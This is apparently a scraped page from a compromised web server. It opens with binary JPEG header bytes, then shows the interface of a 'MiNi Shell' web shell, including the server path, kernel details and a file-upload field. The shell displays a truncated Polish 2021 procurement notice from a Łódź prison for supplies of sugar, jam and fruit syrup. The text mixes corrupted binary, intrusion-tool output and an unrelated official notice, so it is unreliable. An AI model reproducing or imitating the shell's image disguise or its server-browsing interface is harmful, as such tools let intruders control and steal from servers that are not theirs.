JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211119/0027540701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawy cukru i przetworów owocowych do jednostek organizacyjnych<br/>Służby Więziennej okręgu łódzkiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KARNY NR 1 W ŁODZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320064</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Beskidzka 54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-612</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">426750410</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">426750500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_lodz_1@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawy cukru i przetworów owocowych do jednostek organizacyjnych<br/>Służby Więziennej okręgu łódzkiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-39f8381f-4907-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00275407</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00021819/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Cukry i przetwory owocowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-39f8381f-4907-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składnie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej, w<br/>postaci miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, i ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal. Wymienione narzędzia zapewniają<br/>możliwość zapoznania się z treścią złożonych dokumentów wyłącznie po upływie terminu na ich<br/>składanie;<br/>1.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”;<br/>1.3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP);<br/>1.4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB;<br/>1.5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP;<br/>1.6. Zamawiający przekazuje na stronie prowadzonego postępowania tj. www.zp.sw.gov.pl - ID<br/>postępowania. Dane postępowanie można wyszukać również na liście wszystkich postępowań w<br/>Ogłoszenie nr 2021/BZP 00274297/01 z dnia 2021-11-18<br/>2021-11-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.<br/>1.7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp., podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów przyjmuje się datę ich przekazania na ePUAP.<br/>1.8. Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu<br/>środków komunikacji elektronicznej wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.zp.sw.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">3. Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a<br/>także art. 6 ustawy z 06.09.2001 r. o dostępie do informacji publicznej.<br/>4. Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4<br/>lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych, zwane dalej „RODO”), informuję, że: Administratorem Danych<br/>Osobowych jest Dyrektor Zakładu Karnego Nr 1 w Łodzi, adres: ul. Beskidzka 54, 91 – 612 Łódź, NIP<br/>728-10-56-651, Tel. 42/6750410, fax 42/6750500<br/>6. Inspektorem Ochrony Danych w Zakładzie Karnym Nr 1 w Łodzi jest Pani Iwona Bobrowska, adres:<br/>ul. Beskidzka 54, 91 – 612 Łódź, NIP 728-10-56-651, Tel. 42/6750410, fax 42/6750500<br/>iwona.bobrowska@sw.gov.pl<br/>7. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Dostawy artykułów sypkich i<br/>strączkowych do jednostek organizacyjnych Służby Więziennej okręgu łódzkiego”, prowadzonym w<br/>trybie podstawowym bez negocjacji. Odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96<br/>ust. 3 ustawy z dnia 29.01.2004 r. – Prawo zamówień publicznych zwana dalej „ustawą Pzp” oraz art. 6<br/>ustawy z dnia 06.09.2001 r. o dostępie do informacji publicznej.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>Ogłoszenie nr 2021/BZP 00274297/01 z dnia 2021-11-18<br/>2021-11-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>ustawy Pzp. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>Posiada Pani/Pan:<br/>- prawo dostępu do danych osobowych na podstawie art. 15 RODO;<br/>- prawo do sprostowania danych na podstawie art. 16 RODO;<br/>- prawo do ograniczenia przetwarzania zgodnie z art. 18 RODO z zastrzeżeniem przypadków,<br/>o których mowa w art. 18 ust. 2 RODO;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia<br/>wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w<br/>przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu<br/>w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane<br/>wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w<br/>treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w<br/>postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 4 do SWZ.<br/>13. Zamawiający informuje, że:<br/>- udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych<br/>dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku<br/>postępowania o udzielenie zamówienia.<br/>- w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z<br/>uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w<br/>art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii<br/>danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.<br/>- skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16<br/>RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.<br/>- w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.<br/>- w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>Ogłoszenie nr 2021/BZP 00274297/01 z dnia 2021-11-18<br/>2021-11-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Dkw.2232.10.2021.RW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 221855,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> cukier biały rafinowany (worki od 1 kg do 50 kg) wg normy PN-72/A-74850:1996; kod CPV – 15831200-4 w ilości 33500 kg </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 74370 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15831200-4 - Cukier biały</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Termin realizacji reklamacji<br/>40 %<br/><br/><br/> 1. Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/> 2. Kryterium: termin realizacji reklamacji - waga kryterium 40% zostanie wyliczony na podstawie następującego zestawienia:<br/>B =<br/>- do 24h – 40 pkt<br/>- do 36h – 20 pkt<br/>- do 48h – 10 pkt<br/>Sposób oceny: minimalizacja<br/>Zamawiający określa przedział czasowy obejmujący akceptowalny czas terminu realizacji reklamacji/zastrzeżeń zgłoszonych wykonawcy w zakresie dostarczonego towaru, jego jakości lub ilości towarów. Wykonawca winien w ofercie podać termin realizacji reklamacji od momentu ich zgłoszenia do 24, 36, 48 godzin. Wykonawca winien podać ilość godzin, np. 24 (liczba całkowita), która zostanie wpisana do umowy. W przypadku braku wpisania w formularzu cenowym przez wykonawcę terminu realizacji reklamacji, zamawiający przyjmuje w celu oceny danej oferty maksymalny termin realizacji reklamacji od momentu ich zgłoszenia tj. 48 godzin. Termin realizacji reklamacji określony w ofercie wykonawcy powyżej 48 godzin zostanie oceniony na 0 pkt., natomiast termin realizacji reklamacji poniżej 24 godzin zostanie oceniony jak dla 24 godzin, tj. 40 pkt.<br/>Całkowitą ilość punktów oferty wylicza się z poniższego wzoru:<br/>C = A + B<br/>gdzie,<br/>C = całkowita ilość punktów przyznana ofercie (maksymalnie 100 pkt)<br/>A = liczba punktów przyznana za kryterium CENA (maksymalnie 60 pkt)<br/>B = liczba punktów przyznana za kryterium TERMIN REALIZACJI REKLAMACJI (maksymalnie 40 pkt)<br/><br/> 3. Sposób oceny: Zamawiający udzieli zamówienia wykonawcy, którego oferta nie będzie podlegała odrzuceniu i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria. Łączna maksymalna liczba punktów, którą może otrzymać oferta wynosi 100. Ilość punktów zostanie określona z dokładnością do drugiego miejsca po przecinku. O wyborze wykonawcy zamawiający niezwłocznie zawiadomi uczestników postępowania, którzy ubiegali się o udzielenie zamówienia.<br/> 4. Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/> 5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Dżem truskawkowy niskosłodzony (opak. wiadro do 15 kg) wg normy PN-A-75100; kod CPV – 15332296-5 w ilości 16400 kg,<br/>2)	Dżem różne smaki niskosłodzony (opakowanie 25g) wg normy PN-A-75100; kod CPV – 15332290-3 w ilości 350 kg<br/>3)	Marmolada wieloowocowa niskosłodzona (opak. wiadro do 15 kg) wg normy PN-93/A/75103; kod CPV – 153322305 w ilości 20250 kg,<br/>4)	Syrop owocowy (różne smaki), (opak. bańka do 5 litrów) wg normy PN-A – 75955:1963P; kod CPV – 15321000-4 w ilości 32400 litrów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 147485,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15332296-5 - Dżem truskawkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15321000-4 - Soki owocowe</p> <p class="mb-0">15332230-5 - Marmolady</p> <p class="mb-0">15332290-3 - Dżemy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Termin realizacji 